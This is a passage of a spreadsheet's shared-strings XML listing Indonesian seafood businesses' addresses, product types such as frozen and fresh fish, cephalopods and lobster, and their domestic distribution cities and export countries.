    <t>Kota Yogyakarta, Kabupaten Malang, Kota Malang, Kota Surabaya, Kota Denpasar, Kota Banjarmasin, Kota Makassar</t>
  </si>
  <si>
    <t>Jl. Raya Tulis RT 03 RW 08, Kel. Besito, Kec. Gebog, Kabupaten Kudus&lt;br&gt;Jawa Tengah</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Barramundi, Mata Besar, Lencam, Sebelah, Manyung, Kerapu, Layur, Kakatua, Bawal, Kakap, Ayam-ayam, Lidah, Kurisi)</t>
  </si>
  <si>
    <t>Japan, Thailand</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Teri, Lemuru, Barakuda, Terbang, Kuwe, Tembang, Julung-julung, Kembung, Layaran, Selar, Layang, Tenggiri)</t>
  </si>
  <si>
    <t>Jl. PPD Blok C-2 No.2 RT 004 RW 004, Kel. Kedaung Kali Angke, Kec. Cengkareng, Kota Jakarta Barat&lt;br&gt;DKI Jakarta</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Barramundi, Kakap)</t>
  </si>
  <si>
    <t>Kota Makassar</t>
  </si>
  <si>
    <t>Lobster Beku</t>
  </si>
  <si>
    <t>Kawasan Pelabuhan Perikanan Muara Angke, Jl. Pendaratan Ikan No. 3 Muara Angke, Kel. Pluit, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta</t>
  </si>
  <si>
    <t>Kabupaten Bangka, Kabupaten Belitung, Kota Batam</t>
  </si>
  <si>
    <t>China, Hong Kong, Malaysia, Philippines, Singapore, Taiwan, Province of China, Thailand, Viet Nam</t>
  </si>
  <si>
    <t>Cephalopoda Segar (Sotong, Gurita, Cumi-cumi)</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Makerel Atlantik, Lemuru, Tongkol, Capelin, Kembung, Lemadang, Gindara, Salem, Layang, Cakalang, Tenggiri)</t>
  </si>
  <si>
    <t>Ikan Pelagis Segar (Makerel Atlantik, Lemuru, Tongkol, Capelin, Kembung, Lemadang, Gindara, Salem, Layang, Cakalang, Tenggiri)</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Bawal, Malong, Gulama, Lencam, Manyung, Kuwe, Kerapu, Layur, Kakatua, Kakap, Ayam-ayam, Kuro, Ekor Kuning)</t>
  </si>
  <si>
    <t>Ikan Demersal Segar (Bawal, Malong, Gulama, Lencam, Manyung, Kuwe, Kerapu, Layur, Kakatua, Kakap, Ayam-ayam, Kuro, Ekor Kuning)</t>
  </si>
  <si>
    <t>Pari Segar</t>
  </si>
  <si>
    <t>Udang Kipas Segar</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Barakuda, Tongkol, Kembung, Lemadang, Layang, Cakalang, Tenggiri)</t>
  </si>
  <si>
    <t>Ikan Hasil Budidaya Beku (Lele, Gurami, Bandeng, Patin, Nila)</t>
  </si>
  <si>
    <t>Kota Surabaya</t>
  </si>
  <si>
    <t>Jl. Raya Rembang - Tuban Km 31, Kel. Sumber Sari, Kec. Kragan, Kabupaten Rembang&lt;br&gt;Jawa Tengah</t>
  </si>
  <si>
    <t>United States</t>
  </si>
  <si>
    <t>Jl. Raya Pasar Kemis Km 6, Kel. Sukamantri, Kec. Pasar Kemis, Kabupaten Tangerang&lt;br&gt;Banten</t>
  </si>
  <si>
    <t>Kota Medan, Kota Jakarta Barat, Kota Surabaya</t>
  </si>
  <si>
    <t>China, Czech Republic, France, Italy, Japan, Taiwan, Province of China, Thailand, United States</t>
  </si>
  <si>
    <t>Jl. Rungkut Industri III No.75 RT 04 RW 05, Kel. Rungkut Tengah, Kec. Gununganyar, Kota Surabaya&lt;br&gt;Jawa Timur</t>
  </si>
  <si>
    <t>Japan, South Africa, Spain, Sri Lanka, Suriname, Taiwan, Province of China</t>
  </si>
  <si>
    <t>Singapore, Thailand</t>
  </si>
  <si>
    <t>Komp. Pelabuhan Perikanan Nusantara Palabuhanratu (PPNP) RT 03 RW 19, Kel. Palabuhanratu, Kec. Sukabumi, Kabupaten Sukabumi&lt;br&gt;Jawa Barat</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Layur)</t>
  </si>
  <si>
    <t>Jl. Cumi Raya No.7 Pelabuhan Muara Baru, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta</t>
  </si>
  <si>
    <t>China, Japan, Taiwan, Province of China, Thailand, Viet Nam</t>
  </si>
  <si>
    <t>Pergudangan Bandara Mas Blok T 11, Kel. Kedaung Wetan, Kec. Neglasari, Kota Tangerang&lt;br&gt;Banten</t>
  </si>
  <si>
    <t>Kota Jakarta Utara</t>
  </si>
  <si>
    <t>China, Hong Kong, Malaysia, Singapore, Taiwan, Province of China</t>
  </si>
  <si>
    <t>Lobster Air Tawar Hidup</t>
  </si>
  <si>
    <t>China, Hong Kong, Taiwan, Province of China</t>
  </si>
  <si>
    <t>Hong Kong, Taiwan, Province of China</t>
  </si>
  <si>
    <t>China, Taiwan, Province of China</t>
  </si>
  <si>
    <t>Udang Hidup</t>
  </si>
  <si>
    <t>Cacing Laut Hidup</t>
  </si>
  <si>
    <t>Belut Beku</t>
  </si>
  <si>
    <t>Betutu Hidup</t>
  </si>
  <si>
    <t>Jl. Muara Baru Ujung Blok M No.1-2 (Cold Storage No 1), Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta</t>
  </si>
  <si>
    <t>Cephalopoda Beku (Cumi-cumi)</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Kakap Merah)</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Tongkol, Layang, Salem)</t>
  </si>
  <si>
    <t>Kompleks PPI Lonrae Kav 3, Kel. Lonrae, Kec. Tanete Riattang Timur, Kabupaten Bone&lt;br&gt;Sulawesi Selatan</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Tenggiri, Cakalang, Baby Tuna, Deho)</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Kerapu, Sunu, Kakaktua)</t>
  </si>
  <si>
    <t>Cephalopoda Beku (Cumi-Cumi, Gurita, Sotong)</t>
  </si>
  <si>
    <t>Jl. Raya Cangkringmalang Km 6, Kel. Cangkringmalang, Kec. Beji, Kabupaten Pasuruan&lt;br&gt;Jawa Timur</t>
  </si>
  <si>
    <t>Kompleks Pelabuhan Paotere Makassar, Kel. Gusung, Kec. Ujung Tanah, Kota Makassar&lt;br&gt;Sulawesi Selatan</t>
  </si>
  <si>
    <t>Jl. Raya Salembaran Komplek Pergudangan Royal Kosambi Blok D6 RT 006 RW 003, Kel. Cengklong, Kec. Kosambi, Kabupaten Tangerang&lt;br&gt;Banten</t>
  </si>
  <si>
    <t>Kabupaten Tangerang</t>
  </si>
  <si>
    <t>China, Viet Nam</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Panni, Tongkol, Kembung, Kawabida, Salem)</t>
  </si>
  <si>
    <t>Pergudangan Mutiara Tambak Langon D-27, Kel. Tambak Langon, Kec. Asemrowo, Kota Surabaya&lt;br&gt;Jawa Timur</t>
  </si>
  <si>
    <t>Desa Wonokoyo, Kec. Beji, Kabupaten Pasuruan&lt;br&gt;Jawa Timur</t>
  </si>
  <si>
    <t>Jl. Wolter Monginsidi No.28, Kel. Nalu, Kec. Baolan, Kabupaten Tolitoli&lt;br&gt;Sulawesi Tengah</t>
  </si>
  <si>
    <t>Kerang Segar</t>
  </si>
  <si>
    <t>Bulu Babi Segar</t>
  </si>
  <si>
    <t>Bulu Babi Beku</t>
  </si>
  <si>
    <t>Jl. KIG Raya Selatan Kav C-5 &amp; C-13 Kawasan Industri Gresik, Kel. Randuagung, Kec. Kebomas, Kabupaten Gresik&lt;br&gt;Jawa Timur</t>
  </si>
  <si>
    <t>Jl. Perikanan RT 002 RW 004, Kel. Klaligi, Kec. Sorong Manoi, Kota Sorong&lt;br&gt;Papua Barat</t>
  </si>
  <si>
    <t>Ikan Demersal Segar (Kakap, Kerapu)</t>
  </si>
  <si>
    <t>Ikan Demesal Beku (Kakap, Kerapu)</t>
  </si>
  <si>
    <t>Jl. Samuel Languyu No.8A, Kel. Aertembaga Satu, Kec. Aertembaga, Kota Bitung&lt;br&gt;Sulawesi Utara</t>
  </si>
  <si>
    <t>Ikan Demersal Segar (Kerapu, Kakap)</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Kerapu, Kakap)</t>
  </si>
  <si>
    <t>Batu Kapal RT 002 RW 004, Kel. Ranai, Kec. Bungaran Timur, Kabupaten Natuna&lt;br&gt;Kepulauan Riau</t>
  </si>
  <si>
    <t>Ikan Demersal Segar  (Angoli, Kerapu, Ekor Kuning)</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Angoli, Kerapu, Ekor Kuning)</t>
  </si>
  <si>
    <t>Ikan Pelagis Segar (Tenggiri)</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Tongkol, Layang, Mata Besar, Tenggiri)</t>
  </si>
  <si>
    <t>Cephalopoda Beku (Gurita, Cumi-Cumi)</t>
  </si>
  <si>
    <t>Cephalopoda Segar (Cumi-Cumi)</t>
  </si>
  <si>
    <t>Jl. Tekno I Kawasan Industri Jababeka 3C No.3B, Kel. Pasir Gombong, Kec. Cikarang Utara, Kabupaten Bekasi&lt;br&gt;Jawa Barat</t>
  </si>
  <si>
    <t>Kepiting Beku</t>
  </si>
  <si>
    <t>Dusun Geneng RT 02 RW 04, Kel. Maron, Kec. Banyakan, Kabupaten Kediri&lt;br&gt;Jawa Timur</t>
  </si>
  <si>
    <t>Desa Purworejo RT 03 RW 02, Kec. Kaliori, Kabupaten Rembang&lt;br&gt;Jawa Tengah</t>
  </si>
  <si>
    <t>Himego Kering</t>
  </si>
  <si>
    <t>Jl. Ahmad Yani Klademak I, Kel. Klaligi, Kec. Sorong Manoi, Kota Sorong&lt;br&gt;Papua Barat</t>
  </si>
  <si>
    <t>Lingkungan I RT 003 RW 001, Kel. Pinangunian, Kec. Aertembaga, Kota Bitung&lt;br&gt;Sulawesi Utara</t>
  </si>
  <si>
    <t>Jl. Pulau Nias Selatan No.1 KIM 3, Kel. Mabar, Kec. Medan Deli , Kota Medan&lt;br&gt;Sumatera Utara</t>
  </si>
  <si>
    <t>Kerang Beku, Scallop Beku, Mussel Beku</t>
  </si>
  <si>
    <t>Kota Medan</t>
  </si>
  <si>
    <t>Jl. Veteran Lingkar Timur Komplek Pergudangan dan Industri CIP Blok Omega No.3A, Kel. Kemiri, Kec. Sidoarjo, Kabupaten Sidoarjo&lt;br&gt;Jawa Timur</t>
  </si>
  <si>
    <t>Jl. A.Yani Km 45,6, Kel. Pulau Sari, Kec. Tambang Ulang, Kabupaten Tanah Laut&lt;br&gt;Kalimantan Selatan</t>
  </si>
  <si>
    <t>Komplek Pelabuhan Perikanan Samudera Bitung , Kel. Aertembaga Satu, Kec. Aertembaga , Kota Bitung&lt;br&gt;Sulawesi Utara</t>
  </si>
  <si>
    <t>Komplek Pelabuhan Perikanan Samudera Bitung, Kel. Aertembaga Satu, Kec. Aertembaga, Kota Bitung&lt;br&gt;Sulawesi Utara</t>
  </si>
  <si>
    <t>Kawasan Pelabuhan Perikanan Samudera Nizam Zachman Jakarta Jl. Tuna Raya Blok D Kav No.3, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta</t>
  </si>
  <si>
    <t>Jl. Pulau Nias Selatan No.1 KIM III, Kel. Mabar, Kec. Medan Deli, Kota Medan&lt;br&gt;Sumatera Utara</t>
  </si>
  <si>
    <t>Cephalopoda Beku (Gurita, Cumi-cumi)</t>
  </si>
  <si>
    <t>Kota Medan, Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kota Denpasar</t>
  </si>
  <si>
    <t>China, Korea, Democratic People's Republic of, Malaysia</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Malong, Layur, Gulama)</t>
  </si>
  <si>
    <t>Kabupaten Aceh Singkil, Kota Sibolga</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Kuring, Salem)</t>
  </si>
  <si>
    <t>Kabupaten Aceh Singkil, Kota Sibolga, Kota Medan</t>
  </si>
  <si>
    <t>Tepung Rumput Laut</t>
  </si>
  <si>
    <t>Karagenan</t>
  </si>
  <si>
    <t>Desa Tanggul Rejo RT 13 RW 03, Kec. Manyar, Kabupaten Gresik&lt;br&gt;Jawa Timur</t>
  </si>
  <si>
    <t>Produk Perikanan Bernilai Tambah Beku (Bandeng Presto, Bandeng Asap, Pepes Bandeng, Otak-otak Bandeng)</t>
  </si>
  <si>
    <t>Kabupaten Sidoarjo, Kabupaten Mojokerto, Kabupaten Lamongan, Kabupaten Gresik, Kota Mojokerto, Kota Madiun, Kota Surabaya</t>
  </si>
  <si>
    <t>Jl. Baran Satu Meral RT 002 RW 003, Kel. Baran, Kec. Meral, Kabupaten Karimun&lt;br&gt;Kepulauan Riau</t>
  </si>
  <si>
    <t>Ikan Pelagis Segar (Lemuru, Mata Besar, Tongkol, Kembung, Talang-talang, Sarden, Selar, Tenggiri)</t>
  </si>
  <si>
    <t>Singapore</t>
  </si>
  <si>
    <t>Ikan Demersal Segar (Malong, Gulama, Bawal, Layur, Alu-alu, Kerapu, Gerot-gerot, Jebung, Jenaha, Kakap, Kurau, Parang-parang, Ekor Kuning)</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Malong, Gulama, Bawal, Layur, Alu-alu, Kerapu, Gerot-gerot, Jebung, Jenaha, Kakap, Kurau, Parang-parang, Ekor Kuning)</t>
  </si>
  <si>
    <t>Jl. Raya Tratas No.19, Kel. Kedungringin, Kec. Muncar, Kabupaten Banyuwangi&lt;br&gt;Jawa Timur</t>
  </si>
  <si>
    <t>Ikan Demesal Beku (Swanggi, Sebelah, Manyung, Kerapu, Gerot-gerot, Layur, Bawal, Kakap, Kurisi, Ekor Kuning)</t>
  </si>
  <si>
    <t>Bahrain, Central African Republic, Egypt, Hong Kong, Iran, Islamic Republic of, Israel, Kuwait, Lebanon, Philippines, Saudi Arabia, Thailand</t>
  </si>
  <si>
    <t>Jl. Kima III Kav 5 AB, Kel. Daya, Kec. Biringkanaya, Kota Makassar&lt;br&gt;Sulawesi Selatan</t>
  </si>
  <si>
    <t>Ikan Pelagis Segar (Baby Tuna, Bawal, Kembung, Lemadang, Layang, Cakalang, Tenggiri, Pedang)</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Baby Tuna, Bawal, Kembung, Lemadang, Layaran, Layang, Cakalang, Tenggiri, Pedang)</t>
  </si>
  <si>
    <t>Ikan Demersal Segar (Kakap, Lencam, Kambing-kambing, Jenaha, Kerapu, Kakatua, Pinjalo, Jenggot, Kurisi)</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Kakap, Lencam, Kambing-kambing, Jenaha, Kerapu, Kakatua, Pinjalo, Jenggot, Kurisi)</t>
  </si>
  <si>
    <t>Dusun Glundung RT 004 RW 002, Kel. Pranti, Kec. Menganti, Kabupaten Gresik&lt;br&gt;Jawa Timur</t>
  </si>
  <si>
    <t>Kulit Hiu Kering, Kulit Pari Kering</t>
  </si>
  <si>
    <t>Kp. Kemboja No.72 RT 01 RW 11, Kec. Tanjungpinang Barat, Kota Tanjung Pinang&lt;br&gt;Kepulauan Riau</t>
  </si>
  <si>
    <t>Kota Batam</t>
  </si>
  <si>
    <t>Malaysia, Singapore</t>
  </si>
  <si>
    <t>Rajungan Segar</t>
  </si>
  <si>
    <t>Cephalopoda Segar (Sotong, Cumi-cumi)</t>
  </si>
  <si>
    <t>Daging Kerang Beku</t>
  </si>
  <si>
    <t xml:space="preserve">Siput Segar </t>
  </si>
  <si>
    <t>Jl. Gabion Perikanan No.8, Kel. Bagan Deli, Kec. Medan Belawan, Kota Medan&lt;br&gt;Sumatera Utara</t>
  </si>
  <si>
    <t>Cephalopoda Beku (Cumi-cumi, Gurita, Sotong)</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Kuring)</t>
  </si>
  <si>
    <t>Jl. Lintang Raya Kav E-5, Kawasan Industri Sentul, Kel. Sentul, Kec. Babakan Madang, Kabupaten Bogor&lt;br&gt;Jawa Barat</t>
  </si>
  <si>
    <t>Teri Kering</t>
  </si>
  <si>
    <t>Ubur-ubur Kering</t>
  </si>
  <si>
    <t>Jl. Kima 10 Blok T No.2B, Kel. Daya, Kec. Biringkanaya, Kota Makassar&lt;br&gt;Sulawesi Selatan</t>
  </si>
  <si>
    <t>Alkali Treated Cottonii Chips</t>
  </si>
  <si>
    <t>Jl. Raya Cirebon - Losari KM 28,5, Kel. Malaka Sari, Kec. Gebang, Kabupaten Cirebon&lt;br&gt;Jawa Barat</t>
  </si>
  <si>
    <t>Jl. Gabion Perikanan Nusantara No.4, Kel. Bagan Deli , Kec. Medan Belawan , Kota Medan&lt;br&gt;Sumatera Utara</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Kerapu, Layur, Bawal, Kakap, Lidah)</t>
  </si>
  <si>
    <t>Australia, Japan, Korea, Democratic People's Republic of, Malaysia</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Tongkol, Kuring, Sarden, Aso-aso, Layang, Perak-perak, Tenggiri)</t>
  </si>
  <si>
    <t>Selat Lampa RT 003 RW 002, Kel. Sabang Mawang Barat, Kec. Pulau Tiga, Kabupaten Natuna&lt;br&gt;Kepulauan Riau</t>
  </si>
  <si>
    <t>Ikan Pelagis Segar (Mata Besar, Tongkol, Deho, Selar, Layang, Tamban, Tenggiri)</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Mata Besar, Tongkol, Deho, Selar, Layang, Tamban, Tenggiri)</t>
  </si>
  <si>
    <t>Kabupaten Natuna</t>
  </si>
  <si>
    <t>Ikan Demersal Segar (Pisang-pisang, Anggoli, Kerapu, Jebung, Ilak, Kakap, Ekor Kuning)</t>
  </si>
  <si>
    <t>Jl. Awe Blang No.3, Kel. Neusu Aceh, Kec. Baiturrahman, Kota Banda Aceh&lt;br&gt;Aceh</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Tongkol, Kembung, Sarden, Selar, Cakalang, Tenggiri)</t>
  </si>
  <si>
    <t>Ikan Demersal Segar (Lencam, Kuwe, Kerapu, Kakatua, Merah, Kakap)</t>
  </si>
  <si>
    <t>Ikan Demersal Hidup (Kerapu, Kakap)</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Makerel, Lemadang, Jarum, Pedang, King Fish)</t>
  </si>
  <si>
    <t>Ikan Hasil Budidaya Beku (Lele, Bandeng, Patin, Nila)</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Barakuda, Barramundi, Lencam, Kuwe, Kerapu, Layur, Kakatua, Seabream, Kakap, Kaci-kaci)</t>
  </si>
  <si>
    <t>Jl. KIG Raya Selatan Kav C15 Kawasan Industri Gresik, Kel. Randuagung, Kec. Kebomas, Kabupaten Gresik&lt;br&gt;Jawa Timur</t>
  </si>
  <si>
    <t>Daging Rajungan Beku</t>
  </si>
  <si>
    <t>Pergudangan Emerald Green D.8, Bukit Semarang Baru (BSB), Kel. Jatibarang, Kec. Mijen, Kota Semarang&lt;br&gt;Jawa Tengah</t>
  </si>
  <si>
    <t>Fillet Ikan Segar</t>
  </si>
  <si>
    <t>Bandeng Segar</t>
  </si>
  <si>
    <t>Teripang Segar</t>
  </si>
  <si>
    <t>Lobster Segar</t>
  </si>
  <si>
    <t>Cephalopoda Segar (Cumi-cumi)</t>
  </si>
  <si>
    <t>Ikan Demersal Segar (Sebelah, Biji Nangka, Kerapu, Gerot-gerot, Layur, Jenaha, Bawal, Kakap, Kuro, Kurisi)</t>
  </si>
  <si>
    <t>Ikan Pelagis Segar (Kuwe, Kembung, Tenggiri, Selar Kuning)</t>
  </si>
  <si>
    <t>Japan, United States</t>
  </si>
  <si>
    <t>Jl. Industri II, Kel. Tanjung Priok, Kec. Tanjung Priok, Kota Jakarta Utara&lt;br&gt;DKI Jakarta</t>
  </si>
  <si>
    <t>Udang Kipas Beku</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Pisang-pisang, Anggoli, Kerapu, Jebung, ilak, Kakap, Ekor Kuning)</t>
  </si>
  <si>
    <t>Jl. KIG Raya Selatan Kav C6 &amp; C14 Kawasan Industri Gresik, Kel. Randuagung, Kec. Kebomas, Kabupaten Gresik&lt;br&gt;Jawa Timur</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Deho, Malalugis, Cakalang)</t>
  </si>
  <si>
    <t>Komplek Pelabuhan Perikanan Pantai Mayangan, Kel. Mangunharjo, Kec. Mayangan, Kota Probolinggo&lt;br&gt;Jawa Timur</t>
  </si>
  <si>
    <t>Ikan Beku Hasil Budidaya (Lele, Bandeng, Mujair, Udang, Nila)</t>
  </si>
  <si>
    <t>Kota Jakarta Pusat, Kota Jakarta Utara, Kabupaten Probolinggo, Kota Probolinggo, Kota Surabaya, Kota Denpasar</t>
  </si>
  <si>
    <t>China, Korea, Democratic People's Republic of, Philippines, Sri Lanka, Thailand, Viet Nam</t>
  </si>
  <si>
    <t>Kota Jakarta Utara, Kota Tegal, Kabupaten Lamongan, Kota Surabaya, Kota Tangerang</t>
  </si>
  <si>
    <t>China, Japan, Korea, Democratic People's Republic of, Philippines, Thailand, United States, Viet Nam</t>
  </si>
  <si>
    <t>Kota Jakarta Utara, Kota Semarang, Kabupaten Lamongan, Kota Surabaya</t>
  </si>
  <si>
    <t>China, Japan, Korea, Democratic People's Republic of, Malaysia, Oman, Philippines, Sri Lanka, Thailand, Viet Nam</t>
  </si>
  <si>
    <t>Kota Jakarta Utara, Kota Surabaya</t>
  </si>
  <si>
    <t>China, Korea, Democratic People's Republic of, Philippines, Thailand, Viet Nam</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Baby Tuna, Lemuru, Barakuda, Deho, Layur, Kembung, Salem, Sero, Tamban)</t>
  </si>
  <si>
    <t>Kota Jakarta Utara, Kabupaten Lamongan, Kota Surabaya, Kota Tangerang</t>
  </si>
  <si>
    <t>China, Japan, Korea, Democratic People's Republic of, Philippines, Thailand, Viet Nam</t>
  </si>
  <si>
    <t>Kota Jakarta Utara, Kota Surabaya, Kota Denpasar</t>
  </si>
  <si>
    <t>China, Japan, Korea, Democratic People's Republic of, Thailand, United States</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Barakuda, Kakap Putih, Swanggi, Bawal Hitam, Gulama)</t>
  </si>
  <si>
    <t>China, Japan, Korea, Democratic People's Republic of, Oman, Philippines, Thailand, Viet Nam</t>
  </si>
  <si>
    <t>Kota Jakarta Utara, Kabupaten Pati, Kota Tegal, Kabupaten Lamongan, Kota Surabaya</t>
  </si>
  <si>
    <t>Ds Tenaru RT 11 RW 4, Kel. Tenaru, Kec. Driyorejo, Kabupaten Gresik&lt;br&gt;Jawa Timur</t>
  </si>
  <si>
    <t>Produk Perikanan Bernilai Tambah Beku (Siomay Udang, Nugget Udang, Hakau Udang, Pastel Udang Ekor)</t>
  </si>
  <si>
    <t>Kabupaten Kediri, Kabupaten Jombang, Kabupaten Gresik, Kota Malang, Kota Denpasar</t>
  </si>
  <si>
    <t>Seafood Bernilai Tambah Beku (Bakso Ikan, Siomay Ikan, Nugget Ikan, Kue Kepiting, Samosa, Roll Udang, Takoyaki, Udang Berlapis Tepung Beku)</t>
  </si>
  <si>
    <t>Jl. Raya Sambelia, Dusun Batu Baserung, Kel. Gunung Malang, Kec. Pringgabaya, Kabupaten Lombok Timur&lt;br&gt;Nusa Tenggara Barat</t>
  </si>
  <si>
    <t>Kabupaten Banyuwangi, Kota Surabaya, Kabupaten Badung, Kabupaten Lombok Timur, Kota Mataram</t>
  </si>
  <si>
    <t>China, United States, Viet Nam</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Lencam, Kerapu, Kakap)</t>
  </si>
  <si>
    <t>Kabupaten Lombok Barat</t>
  </si>
  <si>
    <t>China, Japan, United States</t>
  </si>
  <si>
    <t>China, Japan</t>
  </si>
  <si>
    <t>Ikan Demersal Segar (Lencam, Kerapu, Kakap)</t>
  </si>
  <si>
    <t>Kabupaten Lombok Timur</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Baby Tuna, Tongkol, Kembung, Lemadang, Marlin, Layang, Cakalang, Tenggiri)</t>
  </si>
  <si>
    <t>Jl. Inspeksi Jasa Tirta, Kel. Bono, Kec. Boyolangu, Kabupaten Tulungagung&lt;br&gt;Jawa Timur</t>
  </si>
  <si>
    <t>Ikan Hasil Budidaya Beku (Lele, Gurame, Patin, Nila)</t>
  </si>
  <si>
    <t>Jl. Pejuang 45, Dusun Hargosari I, Kel. Merbau Mataram, Kec. Merbau Mataram, Kabupaten Lampung Selatan&lt;br&gt;Lampung</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Lemadang, Marlin, Tenggiri)</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Bawal, Kerapu, Kakap, Layur)</t>
  </si>
  <si>
    <t>Rajungan Beku</t>
  </si>
  <si>
    <t>Jl. Pelabuhan Perikanan Lingkungan XI Gabion, Kel. Bagan Deli, Kec. Medan Belawan, Kota Medan&lt;br&gt;Sumatera Utara</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Senangin, Tenggiri, Selar Kuning)</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Malong, Gulama, Biji Nangka, Janahan, Kerapu, Layur, Sukang, Beloso, Bawal, Merah, Kapas-kapas, Rejung)</t>
  </si>
  <si>
    <t>Jl. Kalisolek RT 05 RW 03, Kel. Langenharjo, Kec. Juwana, Kabupaten Pati&lt;br&gt;Jawa Tengah</t>
  </si>
  <si>
    <t>Jl. Arnoldus Sompotan, Kel. Aertembaga I, Kec. Aertembaga, Kota Bitung&lt;br&gt;Sulawesi Utara</t>
  </si>
  <si>
    <t>Sarden Kaleng, Mackerel Kaleng</t>
  </si>
  <si>
    <t>Kota Jakarta Pusat, Kota Manado, Kota Bitung</t>
  </si>
  <si>
    <t>Jl. Arnoldus Sompotan, Kel. Aertembaga I, Kec. Aertembaga , Kota Bitung&lt;br&gt;Sulawesi Utara</t>
  </si>
  <si>
    <t>Jl. Ikan Tuna Barat No.81 Pelabuhan Benoa, Kel. Pedungan, Kec. Denpasar Selatan, Kota Denpasar&lt;br&gt;Bali</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Kakap, Kerapu)</t>
  </si>
  <si>
    <t>Ikan Pelagis Segar (Tenggiri, Lemadang, Marlin)</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Tenggiri, Lemadang, Marlin)</t>
  </si>
  <si>
    <t>Taman Tekno BSD Sektor XI Blok H2 No.29, Kel. Setu, Kec. Setu, Kota Tangerang Selatan&lt;br&gt;Banten</t>
  </si>
  <si>
    <t>Jl. WR Supratman RT 01 RW 15, Kel. Panjang Wetan, Kec. Pekalongan Utara, Kabupaten Pekalongan&lt;br&gt;Jawa Tengah</t>
  </si>
  <si>
    <t>Jl Ringroad Dusun Pereng RT 001 RW 007, Kel. Gendong Kulon, Kec. Babat, Kabupaten Lamongan&lt;br&gt;Jawa Timur</t>
  </si>
  <si>
    <t>Kabupaten Lamongan</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Tongkol, Kembung, Layang, Cakalang, Salem)</t>
  </si>
  <si>
    <t>Kabupaten Lamongan, Kota Surabaya</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Lencam, Manyung, Kerapu, Layur, Sukang, Malabar, Bawal, Seabream, Kakap, Kaci-kaci, Kurisi, Barramundi, Kapas-kapas)</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Teri, Kembung, Sarden, Banjar, Herring)</t>
  </si>
  <si>
    <t>Jl. Pandaan Bangil Km 4, Dusun Tudan, Kel. Kemiri Sewu, Kec. Pandaan, Kabupaten Pasuruan&lt;br&gt;Jawa Timur</t>
  </si>
  <si>
    <t>Pelantar Asam Gg II RT 02 RW 07, Kel. Tanjungpinang Kota, Kec. Tanjungpinang Kota, Kota Tanjung Pinang&lt;br&gt;Kepulauan Riau</t>
  </si>
  <si>
    <t>Kampung Jati, Kel. Labuhan Lombok, Kec. Pringgabaya, Kabupaten Lombok Timur&lt;br&gt;Nusa Tenggara Barat</t>
  </si>
  <si>
    <t>Kota Denpasar</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Baby Tuna, Tongkol, Lemadang, Marlin, Layang, Cakalang)</t>
  </si>
  <si>
    <t>Kabupaten Banyuwangi, Kota Denpasar</t>
  </si>
  <si>
    <t>Ikan Pelagis Segar (Baby Tuna, Tongkol, Lemadang, Marlin, Layaran, Layang, Cakalang)</t>
  </si>
  <si>
    <t>Jl. Yos Sudarso No.8 RT 04 RW 02, Kel. Bulang, Kec. Prambon, Kabupaten Sidoarjo&lt;br&gt;Jawa Timur</t>
  </si>
  <si>
    <t>Kota Bandung, Kota Yogyakarta, Kabupaten Sidoarjo, Kota Surabaya</t>
  </si>
  <si>
    <t>Netherlands</t>
  </si>
  <si>
    <t>Derman RT 005, Kel. Sumbermulyo, Kec. Bambang Lipuro, Kabupaten Bantul&lt;br&gt;Daerah Istimewa Yogyakarta</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Gulama, Lencam, Kerapu, Layur, Kakap)</t>
  </si>
  <si>
    <t>Kota Jakarta Pusat, Kabupaten Tanah Laut</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Tongkol, Kembung, Layang, Tenggiri)</t>
  </si>
  <si>
    <t xml:space="preserve">Fillet Ikan Beku </t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Layur, Bawal, Kakap, Ekor Kuning)</t>
  </si>
  <si>
